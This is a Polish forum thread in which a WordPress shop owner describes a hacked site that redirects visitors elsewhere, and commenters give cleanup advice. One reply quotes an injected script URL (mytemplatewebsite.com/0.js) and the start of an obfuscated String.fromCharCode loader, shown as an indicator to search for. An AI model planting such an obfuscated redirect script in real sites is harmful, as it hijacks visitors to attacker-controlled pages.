Wpis z mikrobloga

Skopiuj link

 Skopiuj link
RazYouDude
RazYouDude
  • 1
Mirki, mam problem.
#programowanie #sieci #hacking #wordpress
Mam sobie mały sklep internetowy i codziennie coś tam na nim sobie robie, to nowe produkty to coś innego.
Swierdziłem ze chce SSL, i kupiłem. To było 2 tygodnie temu i wszystko kryształ, działa.
Dizisja wchodze i strona jest przekierowywana na jakiś szit, sprawdzałem już wszystkie htaacces, nigdzie nie widać śladu przekierowania, sprawdzałem wszystkie wp-header'y, index.php i nigdzie nie widze czegoś co może być w jakimkolwiek stopniu powiązane z tymi przekierowywaniami.

Usunałem przez FTP wszystkie pluginy, lecz też bez zmian.
Domene mam na ovh - jeszcze mi nie odpisali
Hosting mam na linuxpl.com - odpisali, wrzucili mi backup. Ale bez zmian.
Nie wiem czy mam sie poddać czy co robić z tym już.

Strona: www.kajet.art
  • 23
  • Odpowiedz

  • Otrzymuj powiadomienia
    o nowych komentarzach
W.....a
W.....a
  • 2
@RazYouDude: Czy Ty jesteś mutli od @Socyn ? Obaj macie ten sam problem :D

Obstawiam obfuskowany eval i inne świństwa gdzieś w plikach lub JS.

Po 1. zmień hasła bo jak się w-----i raz, to wjebią się kolejny.
Po 2. od nowa
  • Odpowiedz
d.....z
d.....z
  • 0
@Socyn: Nie mam pojęcia. Weźcie użyjcie grep -iR szukanadomena na swoim kodzie i zobaczcie co i gdzie wam dołączyło skrypty z tej domeny. Oczywiście nie dam głowy, że nie ma tego w treści jakiegoś komentarza czy innego contentu od strony użytkownika. Wtedy szukajcie w bazie.
  • Odpowiedz
W.....a
W.....a
  • 0
@RazYouDude: Generalnie to obstawiam JS w motywie/pluginie lub niemiłe dodatki functions.php. Tytuł i wszystko są pobierane z bazy i renderowane i w momencie renderowania motywu jest przekierowanie.

Sprawdź też footer.php to też lubią używać.
  • Odpowiedz
W.....a
W.....a
  • 0
@dokad_idziesz: nie będzie tej domeny ;) ogarnięty ktoś je pisał, szukajcie czegoś takiego (liczby będą inne, trza by sprawdzić na tablice kodów charów i będzie do tego mytemapltewebsite

https://mytemplatewebsite.com/0.js?/wp-content/themes/Divi/style_css&ver=3.17.6

var lt = String.fromCharCode(104, 116, 116, 112, 115, 58, 47, 47, 109, 121, 116, 101, 109, 112, 108, 97, 116, 101, 119, 101, 98, 115, 105, 116, 101, 46, 99, 111, 109, 47, 102, 46, 112, 104,
  • Odpowiedz
371t3
  • 0
@RazYouDude: Teraz jest już zapóźno na wyrzucanie :P Zobacz czy nie masz nowych użytkowników w WP. Plus tak jak @dokad_idziesz, trzeba przetrzepać wszystkie pliki *js. Popatrz też na wszystkie pliki pod katem daty modyfikacji.
  • Odpowiedz

Aktywne Wpisy

congobongo
Zgłaszajcie filmiki konfitury na YT za dokuczanie i nękanie (podpada pod 107kw).
Polecam też uciąć mu finansowanie czyli przez formularz kontaktowy patronite skontaktować się z nimi. Pierwsze maile już poszły.
Mam nadzieje, że spadnie z rowerka

#konfitura

93 odpowiedzi

SzubiDubiDu
Jezu, wykop jest tak bardzo martwy. Gdy dodasz na czarno wszystkie polityczne tagi z botami politycznymi to całe mirko z------e jest beką z j-----j reklamy kosiarki

#wykop #parkside
SzubiDubiDu - Jezu, wykop jest tak bardzo martwy. Gdy dodasz na czarno wszystkie poli...

źródło: hq720

Pobierz

24 odpowiedzi

Aktywne Znaleziska

Pułapka bycia dobrym w pracy: dlaczego awans omija najlepszych pracowników
Pułapka bycia dobrym w pracy: dlaczego awans omija najlepszych pracowników
150
Wychodzisz i koniec
Wychodzisz i koniec
228
Park narodowy zatrudnił cyberstrażnika. Instagramerzy już płaczą
Park narodowy zatrudnił cyberstrażnika. Instagramerzy już płaczą
180
Karniści wprost: Sebastian M. mógł być sądzony za zabójstwo, nie za wypadek
Karniści wprost: Sebastian M. mógł być sądzony za zabójstwo, nie za wypadek
535
Arogancja wójt Kołbaskowa. Parkowanie i światło tylko dla jaśnie panci
Arogancja wójt Kołbaskowa. Parkowanie i światło tylko dla jaśnie panci
571

Popularne tagi